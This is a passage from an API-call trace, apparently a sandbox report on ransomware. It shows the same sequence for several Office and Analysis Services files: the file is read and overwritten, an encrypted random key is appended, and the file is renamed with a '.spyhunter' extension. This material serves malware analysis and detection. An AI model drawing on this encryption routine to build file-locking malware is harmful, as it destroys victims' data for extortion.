pdwDataLen=0x270e6d8*=0x30) returned 1 [0165.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.948] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL") returned 64 [0165.948] StrStrW (lpFirst="OWSSUPP.DLL", lpSrch=".txt") returned 0x0 [0165.948] GetProcessHeap () returned 0x2c0000 [0165.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.948] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e69c*=0x2800, lpOverlapped=0x0) returned 1 [0165.996] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.996] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e69c*=0x2800, lpOverlapped=0x0) returned 1 [0165.996] GetProcessHeap () returned 0x2c0000 [0165.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0165.996] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.996] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x270e6dc*, lpNumberOfBytesWritten=0x270e69c*=0x4, lpOverlapped=0x0) returned 1 [0166.224] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e69c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e69c*=0x30, lpOverlapped=0x0) returned 1 [0166.224] CloseHandle (hObject=0x9c) returned 1 [0166.224] GetProcessHeap () returned 0x2c0000 [0166.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.224] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL.spyhunter") returned 74 [0166.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll.spyhunter")) returned 1 [0166.225] GetProcessHeap () returned 0x2c0000 [0166.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.225] GetProcessHeap () returned 0x2c0000 [0166.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0166.225] GetProcessHeap () returned 0x2c0000 [0166.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05e48 | out: hHeap=0x2c0000) returned 1 [0166.226] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6d8 | out: pbBuffer=0x270e6d8) returned 1 [0166.226] GetProcessHeap () returned 0x2c0000 [0166.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0166.226] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6d0*=0x30) returned 1 [0166.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0166.226] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL") returned 65 [0166.226] StrStrW (lpFirst="NPSPWRAP.DLL", lpSrch=".txt") returned 0x0 [0166.226] GetProcessHeap () returned 0x2c0000 [0166.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.227] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e694*=0x2800, lpOverlapped=0x0) returned 1 [0166.326] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.326] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e694*=0x2800, lpOverlapped=0x0) returned 1 [0166.326] GetProcessHeap () returned 0x2c0000 [0166.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.326] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.326] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x270e6d4*, lpNumberOfBytesWritten=0x270e694*=0x4, lpOverlapped=0x0) returned 1 [0166.351] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e694*=0x30, lpOverlapped=0x0) returned 1 [0166.351] CloseHandle (hObject=0x9c) returned 1 [0166.352] GetProcessHeap () returned 0x2c0000 [0166.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.352] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL.spyhunter") returned 75 [0166.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\NPSPWRAP.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\npspwrap.dll.spyhunter")) returned 1 [0166.377] GetProcessHeap () returned 0x2c0000 [0166.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.377] GetProcessHeap () returned 0x2c0000 [0166.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0166.377] GetProcessHeap () returned 0x2c0000 [0166.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05b08 | out: hHeap=0x2c0000) returned 1 [0166.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6d8 | out: pbBuffer=0x270e6d8) returned 1 [0166.377] GetProcessHeap () returned 0x2c0000 [0166.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0166.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6d0*=0x30) returned 1 [0166.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0166.379] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL") returned 65 [0166.379] StrStrW (lpFirst="GROOVEEX.DLL", lpSrch=".txt") returned 0x0 [0166.379] GetProcessHeap () returned 0x2c0000 [0166.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.379] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e694*=0x2800, lpOverlapped=0x0) returned 1 [0166.569] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.569] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e694*=0x2800, lpOverlapped=0x0) returned 1 [0166.570] GetProcessHeap () returned 0x2c0000 [0166.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.570] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.570] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x270e6d4*, lpNumberOfBytesWritten=0x270e694*=0x4, lpOverlapped=0x0) returned 1 [0166.735] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e694, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e694*=0x30, lpOverlapped=0x0) returned 1 [0166.735] CloseHandle (hObject=0x9c) returned 1 [0166.735] GetProcessHeap () returned 0x2c0000 [0166.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.735] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.spyhunter") returned 75 [0166.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\GROOVEEX.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\grooveex.dll.spyhunter")) returned 1 [0166.737] GetProcessHeap () returned 0x2c0000 [0166.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.737] GetProcessHeap () returned 0x2c0000 [0166.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0166.737] GetProcessHeap () returned 0x2c0000 [0166.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05628 | out: hHeap=0x2c0000) returned 1 [0166.737] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6d0 | out: pbBuffer=0x270e6d0) returned 1 [0166.737] GetProcessHeap () returned 0x2c0000 [0166.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0166.737] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6c8*=0x30) returned 1 [0166.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0166.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL") returned 70 [0166.738] StrStrW (lpFirst="STSUCRES.DLL", lpSrch=".txt") returned 0x0 [0166.738] GetProcessHeap () returned 0x2c0000 [0166.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.738] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e68c*=0x2800, lpOverlapped=0x0) returned 1 [0166.768] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.768] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e68c*=0x2800, lpOverlapped=0x0) returned 1 [0166.768] GetProcessHeap () returned 0x2c0000 [0166.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.769] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.769] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x270e6cc*, lpNumberOfBytesWritten=0x270e68c*=0x4, lpOverlapped=0x0) returned 1 [0166.815] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e68c*=0x30, lpOverlapped=0x0) returned 1 [0166.815] CloseHandle (hObject=0x9c) returned 1 [0166.815] GetProcessHeap () returned 0x2c0000 [0166.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.815] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL.spyhunter") returned 80 [0166.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll.spyhunter")) returned 1 [0166.816] GetProcessHeap () returned 0x2c0000 [0166.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.816] GetProcessHeap () returned 0x2c0000 [0166.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0166.816] GetProcessHeap () returned 0x2c0000 [0166.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7e2c8 | out: hHeap=0x2c0000) returned 1 [0166.816] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6d0 | out: pbBuffer=0x270e6d0) returned 1 [0166.816] GetProcessHeap () returned 0x2c0000 [0166.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0166.816] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6c8*=0x30) returned 1 [0166.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0166.817] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 80 [0166.817] StrStrW (lpFirst="msolap100.dll", lpSrch=".txt") returned 0x0 [0166.817] GetProcessHeap () returned 0x2c0000 [0166.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0166.817] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e68c*=0x2800, lpOverlapped=0x0) returned 1 [0166.843] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.843] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e68c*=0x2800, lpOverlapped=0x0) returned 1 [0166.843] GetProcessHeap () returned 0x2c0000 [0166.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0166.843] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.843] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x270e6cc*, lpNumberOfBytesWritten=0x270e68c*=0x4, lpOverlapped=0x0) returned 1 [0166.856] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e68c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e68c*=0x30, lpOverlapped=0x0) returned 1 [0166.856] CloseHandle (hObject=0x9c) returned 1 [0166.860] GetProcessHeap () returned 0x2c0000 [0166.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.861] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.spyhunter") returned 90 [0166.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msolap100.dll.spyhunter")) returned 1 [0166.861] GetProcessHeap () returned 0x2c0000 [0166.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.861] GetProcessHeap () returned 0x2c0000 [0166.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0166.861] GetProcessHeap () returned 0x2c0000 [0166.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece920 | out: hHeap=0x2c0000) returned 1 [0166.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6c8 | out: pbBuffer=0x270e6c8) returned 1 [0166.862] GetProcessHeap () returned 0x2c0000 [0166.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0166.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6c0*=0x30) returned 1 [0166.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0166.862] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 88 [0166.862] StrStrW (lpFirst="Sybase.xsl", lpSrch=".txt") returned 0x0 [0166.862] GetProcessHeap () returned 0x2c0000 [0166.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.862] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e684*=0x2800, lpOverlapped=0x0) returned 1 [0166.957] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.957] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e684*=0x2800, lpOverlapped=0x0) returned 1 [0166.957] GetProcessHeap () returned 0x2c0000 [0166.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.957] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.957] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x270e6c4*, lpNumberOfBytesWritten=0x270e684*=0x4, lpOverlapped=0x0) returned 1 [0167.041] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e684*=0x30, lpOverlapped=0x0) returned 1 [0167.041] CloseHandle (hObject=0x9c) returned 1 [0167.041] GetProcessHeap () returned 0x2c0000 [0167.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.041] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.spyhunter") returned 98 [0167.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.spyhunter")) returned 1 [0167.042] GetProcessHeap () returned 0x2c0000 [0167.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.042] GetProcessHeap () returned 0x2c0000 [0167.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.042] GetProcessHeap () returned 0x2c0000 [0167.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5ebc0 | out: hHeap=0x2c0000) returned 1 [0167.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6c8 | out: pbBuffer=0x270e6c8) returned 1 [0167.043] GetProcessHeap () returned 0x2c0000 [0167.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6c0*=0x30) returned 1 [0167.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.044] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 86 [0167.044] StrStrW (lpFirst="as90.xsl", lpSrch=".txt") returned 0x0 [0167.044] GetProcessHeap () returned 0x2c0000 [0167.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.044] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e684*=0x2800, lpOverlapped=0x0) returned 1 [0167.168] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.168] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e684*=0x2800, lpOverlapped=0x0) returned 1 [0167.169] GetProcessHeap () returned 0x2c0000 [0167.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.169] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, 